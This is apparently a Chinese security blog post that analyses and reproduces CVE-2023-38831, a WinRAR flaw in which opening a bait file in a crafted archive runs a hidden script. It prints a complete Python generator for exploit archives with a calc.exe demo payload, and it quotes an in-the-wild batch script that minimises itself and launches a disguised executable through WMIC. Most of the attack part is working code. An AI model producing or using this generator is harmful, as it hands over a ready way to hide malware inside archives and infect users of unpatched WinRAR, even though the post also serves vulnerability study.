其他
WinRAR 0day CVE-2023-38831分析复现
最近有爆出WinRAR 中的 CVE-2023-38831 0day被在野利用来攻击金融交易类的用户。
利用流程:
WinRar 版本 < 6.23
->生成.RAR EXP文件
-> 受害者打开压缩包中的txt/jpg/pdf等后缀文件
-> 执行exe和对应文件。
利用python生成POC文件的代码如下:
import shutilimport os, sysfrom os.path import joinTEMPLATE_NAME = "TEMPLATE"OUTPUT_NAME = "CVE-2023-38831-poc.rar"
BAIT_NAME = "test.txt"SCRIPT_NAME = "test1.bat"
if len(sys.argv) > 3: BAIT_NAME = os.path.basename(sys.argv[1]) SCRIPT_NAME = os.path.basename(sys.argv[2]) OUTPUT_NAME = os.path.basename(sys.argv[3])elif len(sys.argv) == 2 and sys.argv[1] == "poc": passelse: print("""Usage: python .\cve-2023-38831-exp-gen.py poc python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""") sys.exit()
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
print("BAIT_NAME:", BAIT_NAME)print("SCRIPT_NAME:", SCRIPT_NAME)print("OUTPUT_NAME:", OUTPUT_NAME)
if os.path.exists(TEMPLATE_NAME): shutil.rmtree(TEMPLATE_NAME)os.mkdir(TEMPLATE_NAME)d = join(TEMPLATE_NAME, BAIT_NAME + "A")if not os.path.exists(d): os.mkdir(d)
shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
# if os.path.exists(OUTPUT_NAME):# print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))# sys.exit()
shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
with open(TEMPLATE_NAME + ".zip", "rb") as f: content = f.read() content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ") content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
os.remove(TEMPLATE_NAME + ".zip")
with open(OUTPUT_NAME, "wb") as f: f.write(content)
print("ok..")其中test1.bat代码如下:
calc.exe &test.txt漏洞分析:
2023 年 7 月 10 日,Group-IB威胁情报单位在 WinRAR 处理 ZIP 文件格式时发现了一个的漏洞。通过利用该程序中的漏洞,攻击者能够制作 ZIP 压缩包,作为各种恶意软件系列的载体。武器化的 ZIP 压缩包样本也在各类交易论坛上出现。该漏洞自 2023 年 4 月起就已被利用。
该漏洞补丁的测试版于2023年7月20日发布,最终更新版本WinRAR(版本 6.23)于 2023 年 8 月 2 日发布。
上述样本利用该漏洞通过伪装为任何文件格式来隐藏恶意程序,打开EXP压缩包看到的情况如下,通常是一个安全文件后缀和一个同名文件夹,双击文件就会运行恶意程序。
但真实运行过程如下:
同名文件夹中包含一个恶意bat脚本,脚本代码为:
@echo offif not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit cd %TEMP% for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do for /F "delims=" %%G in ('dir /b /s "Images.ico"') do WMIC process call create "%%~G" && "%%~K" && cd %CD% && exitexit当用户打开 WinRAR 中想要访问的文件时,攻击的主要阶段发生,ShellExecute函数接收到错误的参数来打开文件。图片的文件名与搜索条件不匹配,导致其被跳过,发现不是找到想要的图片,而是发现并执行文件夹中的批处理文件。